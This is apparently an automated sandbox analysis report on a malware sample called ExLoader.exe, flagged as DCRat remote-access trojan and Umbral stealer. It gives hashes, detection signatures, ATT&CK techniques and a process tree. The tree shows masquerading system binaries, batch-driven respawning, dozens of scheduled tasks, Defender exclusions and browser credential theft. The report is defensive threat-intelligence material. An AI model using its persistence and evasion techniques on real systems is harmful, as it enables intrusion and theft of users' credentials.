dcrat | 1fd77f0721116863f5799d464f0f125e3ea188eac0352952538fa294011e6faf

Analysis

max time kernel
148s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
13-06-2024 12:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ExLoader.exe
Size

22.4MB
MD5

960a95f44c437750c49fa69a4383e05d
SHA1

2b4200ebc741deb52214fea69ad2c8e262354b15
SHA256

1fd77f0721116863f5799d464f0f125e3ea188eac0352952538fa294011e6faf
SHA512

2e395157a0833a9b8444b48692a249facb8e435b071002fa3ac731e133e2864b715aee50a8ef7f6b32d76402565e86c226950e9d72a31ed445543c76ae9ba938
SSDEEP

393216:6ZXLruFNpetm1NbM59wDVJnlv3n8K6iyUJ+Ey4GaLJ1XQGBtOs:SXLrWNpPU59I50K4OV2a/BY

Score

10^/10

dcrat umbral execution infostealer rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000100000002aa7e-14.dat	family_umbral
behavioral2/memory/2940-21-0x00000267938B0000-0x00000267938F0000-memory.dmp	family_umbral

Process spawned unexpected child process 42 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4732	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1044	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1076	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1488	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1424	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2268	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3040	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1300	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4672	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	848	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4336	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1960	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4480	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3164	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4404	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3048	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2128	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5024	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4544	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1116	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4912	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2724	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1632	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4888	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3900	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3200	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3992	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4768	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4916	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	460	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2780	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4472	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1984	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	468	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2512	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4308	4380	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	4380	schtasks.exe	86

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x000500000002aa42-6.dat	dcrat
behavioral2/files/0x000100000002aa82-595.dat	dcrat
behavioral2/memory/2068-597-0x0000000000680000-0x00000000007B2000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2580	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	afdg.exe

Executes dropped EXE 30 IoCs

pid	Process
1612	softcheck.exe
2940	afdg.exe
1684	ExLoader_Installer.exe
2312	ExLoader_Installer.exe
2068	WebSessionhost.exe
1292	RuntimeBroker.exe
2124	RuntimeBroker.exe
1076	RuntimeBroker.exe
3348	RuntimeBroker.exe
4836	RuntimeBroker.exe
648	RuntimeBroker.exe
4988	RuntimeBroker.exe
2968	RuntimeBroker.exe
1568	RuntimeBroker.exe
5096	RuntimeBroker.exe
4680	RuntimeBroker.exe
2740	RuntimeBroker.exe
2372	RuntimeBroker.exe
2524	RuntimeBroker.exe
4948	RuntimeBroker.exe
1776	RuntimeBroker.exe
1464	RuntimeBroker.exe
1292	RuntimeBroker.exe
3000	RuntimeBroker.exe
2168	RuntimeBroker.exe
644	RuntimeBroker.exe
4552	RuntimeBroker.exe
4416	RuntimeBroker.exe
3852	RuntimeBroker.exe
3488	RuntimeBroker.exe

Loads dropped DLL 6 IoCs

pid	Process
2312	ExLoader_Installer.exe
2312	ExLoader_Installer.exe
2312	ExLoader_Installer.exe
2312	ExLoader_Installer.exe
2312	ExLoader_Installer.exe
2312	ExLoader_Installer.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\fontdrvhost.exe	WebSessionhost.exe
File created	C:\Program Files (x86)\Common Files\5b884080fd4f94	WebSessionhost.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\spoolsv.exe	WebSessionhost.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\f3b6ecef712a24	WebSessionhost.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Vss\Writers\9e8d7a4ca61bd9	WebSessionhost.exe
File created	C:\Windows\BitLockerDiscoveryVolumeContents\winlogon.exe	WebSessionhost.exe
File created	C:\Windows\BitLockerDiscoveryVolumeContents\cc11b995f2a76d	WebSessionhost.exe
File created	C:\Windows\Vss\Writers\RuntimeBroker.exe	WebSessionhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 42 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4672	schtasks.exe
3052	schtasks.exe
4544	schtasks.exe
460	schtasks.exe
4472	schtasks.exe
4732	schtasks.exe
2384	schtasks.exe
468	schtasks.exe
2512	schtasks.exe
2628	schtasks.exe
3992	schtasks.exe
4308	schtasks.exe
4336	schtasks.exe
3040	schtasks.exe
1960	schtasks.exe
3048	schtasks.exe
2724	schtasks.exe
4888	schtasks.exe
3900	schtasks.exe
4768	schtasks.exe
2268	schtasks.exe
1984	schtasks.exe
4756	schtasks.exe
1988	schtasks.exe
1632	schtasks.exe
3164	schtasks.exe
1300	schtasks.exe
3200	schtasks.exe
4484	schtasks.exe
1488	schtasks.exe
1076	schtasks.exe
4404	schtasks.exe
2128	schtasks.exe
5024	schtasks.exe
2780	schtasks.exe
1044	schtasks.exe
848	schtasks.exe
4480	schtasks.exe
1116	schtasks.exe
4912	schtasks.exe
4916	schtasks.exe
1424	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2460	wmic.exe

Modifies registry class 27 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	WebSessionhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	softcheck.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings	RuntimeBroker.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
960	PING.EXE

Suspicious behavior: EnumeratesProcesses 44 IoCs

pid	Process
2940	afdg.exe
2580	powershell.exe
2580	powershell.exe
1524	powershell.exe
1524	powershell.exe
4388	powershell.exe
4388	powershell.exe
4856	powershell.exe
4856	powershell.exe
2604	powershell.exe
2604	powershell.exe
2068	WebSessionhost.exe
2068	WebSessionhost.exe
2068	WebSessionhost.exe
2068	WebSessionhost.exe
2068	WebSessionhost.exe
2068	WebSessionhost.exe
2068	WebSessionhost.exe
2068	WebSessionhost.exe
1292	RuntimeBroker.exe
2124	RuntimeBroker.exe
1076	RuntimeBroker.exe
3348	RuntimeBroker.exe
4836	RuntimeBroker.exe
648	RuntimeBroker.exe
4988	RuntimeBroker.exe
2968	RuntimeBroker.exe
1568	RuntimeBroker.exe
5096	RuntimeBroker.exe
4680	RuntimeBroker.exe
2740	RuntimeBroker.exe
2372	RuntimeBroker.exe
2524	RuntimeBroker.exe
4948	RuntimeBroker.exe
1776	RuntimeBroker.exe
1464	RuntimeBroker.exe
1292	RuntimeBroker.exe
3000	RuntimeBroker.exe
2168	RuntimeBroker.exe
644	RuntimeBroker.exe
4552	RuntimeBroker.exe
4416	RuntimeBroker.exe
3852	RuntimeBroker.exe
3488	RuntimeBroker.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2940	afdg.exe
Token: SeIncreaseQuotaPrivilege	3556	wmic.exe
Token: SeSecurityPrivilege	3556	wmic.exe
Token: SeTakeOwnershipPrivilege	3556	wmic.exe
Token: SeLoadDriverPrivilege	3556	wmic.exe
Token: SeSystemProfilePrivilege	3556	wmic.exe
Token: SeSystemtimePrivilege	3556	wmic.exe
Token: SeProfSingleProcessPrivilege	3556	wmic.exe
Token: SeIncBasePriorityPrivilege	3556	wmic.exe
Token: SeCreatePagefilePrivilege	3556	wmic.exe
Token: SeBackupPrivilege	3556	wmic.exe
Token: SeRestorePrivilege	3556	wmic.exe
Token: SeShutdownPrivilege	3556	wmic.exe
Token: SeDebugPrivilege	3556	wmic.exe
Token: SeSystemEnvironmentPrivilege	3556	wmic.exe
Token: SeRemoteShutdownPrivilege	3556	wmic.exe
Token: SeUndockPrivilege	3556	wmic.exe
Token: SeManageVolumePrivilege	3556	wmic.exe
Token: 33	3556	wmic.exe
Token: 34	3556	wmic.exe
Token: 35	3556	wmic.exe
Token: 36	3556	wmic.exe
Token: SeIncreaseQuotaPrivilege	3556	wmic.exe
Token: SeSecurityPrivilege	3556	wmic.exe
Token: SeTakeOwnershipPrivilege	3556	wmic.exe
Token: SeLoadDriverPrivilege	3556	wmic.exe
Token: SeSystemProfilePrivilege	3556	wmic.exe
Token: SeSystemtimePrivilege	3556	wmic.exe
Token: SeProfSingleProcessPrivilege	3556	wmic.exe
Token: SeIncBasePriorityPrivilege	3556	wmic.exe
Token: SeCreatePagefilePrivilege	3556	wmic.exe
Token: SeBackupPrivilege	3556	wmic.exe
Token: SeRestorePrivilege	3556	wmic.exe
Token: SeShutdownPrivilege	3556	wmic.exe
Token: SeDebugPrivilege	3556	wmic.exe
Token: SeSystemEnvironmentPrivilege	3556	wmic.exe
Token: SeRemoteShutdownPrivilege	3556	wmic.exe
Token: SeUndockPrivilege	3556	wmic.exe
Token: SeManageVolumePrivilege	3556	wmic.exe
Token: 33	3556	wmic.exe
Token: 34	3556	wmic.exe
Token: 35	3556	wmic.exe
Token: 36	3556	wmic.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeIncreaseQuotaPrivilege	2768	wmic.exe
Token: SeSecurityPrivilege	2768	wmic.exe
Token: SeTakeOwnershipPrivilege	2768	wmic.exe
Token: SeLoadDriverPrivilege	2768	wmic.exe
Token: SeSystemProfilePrivilege	2768	wmic.exe
Token: SeSystemtimePrivilege	2768	wmic.exe
Token: SeProfSingleProcessPrivilege	2768	wmic.exe
Token: SeIncBasePriorityPrivilege	2768	wmic.exe
Token: SeCreatePagefilePrivilege	2768	wmic.exe
Token: SeBackupPrivilege	2768	wmic.exe
Token: SeRestorePrivilege	2768	wmic.exe
Token: SeShutdownPrivilege	2768	wmic.exe
Token: SeDebugPrivilege	2768	wmic.exe
Token: SeSystemEnvironmentPrivilege	2768	wmic.exe
Token: SeRemoteShutdownPrivilege	2768	wmic.exe
Token: SeUndockPrivilege	2768	wmic.exe
Token: SeManageVolumePrivilege	2768	wmic.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2312	ExLoader_Installer.exe
2312	ExLoader_Installer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4584 wrote to memory of 1612	4584	ExLoader.exe	80
PID 4584 wrote to memory of 1612	4584	ExLoader.exe	80
PID 4584 wrote to memory of 1612	4584	ExLoader.exe	80
PID 4584 wrote to memory of 2940	4584	ExLoader.exe	81
PID 4584 wrote to memory of 2940	4584	ExLoader.exe	81
PID 1612 wrote to memory of 4072	1612	softcheck.exe	83
PID 1612 wrote to memory of 4072	1612	softcheck.exe	83
PID 1612 wrote to memory of 4072	1612	softcheck.exe	83
PID 2940 wrote to memory of 3556	2940	afdg.exe	84
PID 2940 wrote to memory of 3556	2940	afdg.exe	84
PID 4584 wrote to memory of 1684	4584	ExLoader.exe	82
PID 4584 wrote to memory of 1684	4584	ExLoader.exe	82
PID 2940 wrote to memory of 740	2940	afdg.exe	87
PID 2940 wrote to memory of 740	2940	afdg.exe	87
PID 2940 wrote to memory of 2580	2940	afdg.exe	89
PID 2940 wrote to memory of 2580	2940	afdg.exe	89
PID 2940 wrote to memory of 1524	2940	afdg.exe	91
PID 2940 wrote to memory of 1524	2940	afdg.exe	91
PID 1684 wrote to memory of 2312	1684	ExLoader_Installer.exe	93
PID 1684 wrote to memory of 2312	1684	ExLoader_Installer.exe	93
PID 2940 wrote to memory of 4388	2940	afdg.exe	94
PID 2940 wrote to memory of 4388	2940	afdg.exe	94
PID 2940 wrote to memory of 4856	2940	afdg.exe	96
PID 2940 wrote to memory of 4856	2940	afdg.exe	96
PID 2940 wrote to memory of 2768	2940	afdg.exe	98
PID 2940 wrote to memory of 2768	2940	afdg.exe	98
PID 2940 wrote to memory of 2124	2940	afdg.exe	100
PID 2940 wrote to memory of 2124	2940	afdg.exe	100
PID 2940 wrote to memory of 488	2940	afdg.exe	102
PID 2940 wrote to memory of 488	2940	afdg.exe	102
PID 2940 wrote to memory of 2604	2940	afdg.exe	104
PID 2940 wrote to memory of 2604	2940	afdg.exe	104
PID 2940 wrote to memory of 2460	2940	afdg.exe	106
PID 2940 wrote to memory of 2460	2940	afdg.exe	106
PID 4072 wrote to memory of 2772	4072	WScript.exe	108
PID 4072 wrote to memory of 2772	4072	WScript.exe	108
PID 4072 wrote to memory of 2772	4072	WScript.exe	108
PID 2772 wrote to memory of 2068	2772	cmd.exe	110
PID 2772 wrote to memory of 2068	2772	cmd.exe	110
PID 2940 wrote to memory of 2836	2940	afdg.exe	111
PID 2940 wrote to memory of 2836	2940	afdg.exe	111
PID 2836 wrote to memory of 960	2836	cmd.exe	113
PID 2836 wrote to memory of 960	2836	cmd.exe	113
PID 2068 wrote to memory of 2452	2068	WebSessionhost.exe	156
PID 2068 wrote to memory of 2452	2068	WebSessionhost.exe	156
PID 2452 wrote to memory of 4100	2452	cmd.exe	158
PID 2452 wrote to memory of 4100	2452	cmd.exe	158
PID 2452 wrote to memory of 1292	2452	cmd.exe	159
PID 2452 wrote to memory of 1292	2452	cmd.exe	159
PID 1292 wrote to memory of 4880	1292	RuntimeBroker.exe	160
PID 1292 wrote to memory of 4880	1292	RuntimeBroker.exe	160
PID 4880 wrote to memory of 2688	4880	cmd.exe	162
PID 4880 wrote to memory of 2688	4880	cmd.exe	162
PID 4880 wrote to memory of 2124	4880	cmd.exe	163
PID 4880 wrote to memory of 2124	4880	cmd.exe	163
PID 2124 wrote to memory of 820	2124	RuntimeBroker.exe	164
PID 2124 wrote to memory of 820	2124	RuntimeBroker.exe	164
PID 820 wrote to memory of 1248	820	cmd.exe	166
PID 820 wrote to memory of 1248	820	cmd.exe	166
PID 820 wrote to memory of 1076	820	cmd.exe	167
PID 820 wrote to memory of 1076	820	cmd.exe	167
PID 1076 wrote to memory of 1300	1076	RuntimeBroker.exe	168
PID 1076 wrote to memory of 1300	1076	RuntimeBroker.exe	168
PID 3348 wrote to memory of 3204	3348	RuntimeBroker.exe	172

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
740	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ExLoader.exe
"C:\Users\Admin\AppData\Local\Temp\ExLoader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Users\Admin\AppData\Local\Temp\softcheck.exe
  "C:\Users\Admin\AppData\Local\Temp\softcheck.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Perfnet\pcwfnmokkxtJ3Iyb.vbe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Perfnet\6BXg6z.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2772
    - - C:\Perfnet\WebSessionhost.exe
        
        "C:\Perfnet\WebSessionhost.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2068
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GydMm7ZmZe.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2452
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4100
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        7⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1292
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NHYDEKme3A.bat"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4880
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:2688
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        9⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Db0hEHdXHW.bat"
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:820
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:1248
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        11⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1076
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2Oj9OucH8K.bat"
        12⤵
        
        PID:1300
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:3404
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        13⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3348
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat"
        14⤵
        
        PID:3204
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        15⤵
        
        PID:4544
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        15⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4836
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\c0ZYbu3Enn.bat"
        16⤵
        
        PID:3900
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        17⤵
        
        PID:4584
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        17⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:648
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1Gu59oh2IN.bat"
        18⤵
        
        PID:1984
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:3888
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        19⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4988
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\axBdnWD1Gl.bat"
        20⤵
        
        PID:1148
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:3976
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        21⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\U4eMIZxK0W.bat"
        22⤵
        
        PID:2452
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        23⤵
        
        PID:4980
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        23⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:1568
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uSuCPwp4Rh.bat"
        24⤵
        
        PID:3000
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        25⤵
        
        PID:1428
        
        C:\Windows\Vss\Writers\RuntimeBroker.exe
        
        "C:\Windows\Vss\Writers\RuntimeBroker.exe"
        25⤵
        Executes dropped EXE
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:5096
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\P9uKrkSNlp.bat"
        26⤵
        
        PID:4732
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        27⤵
        
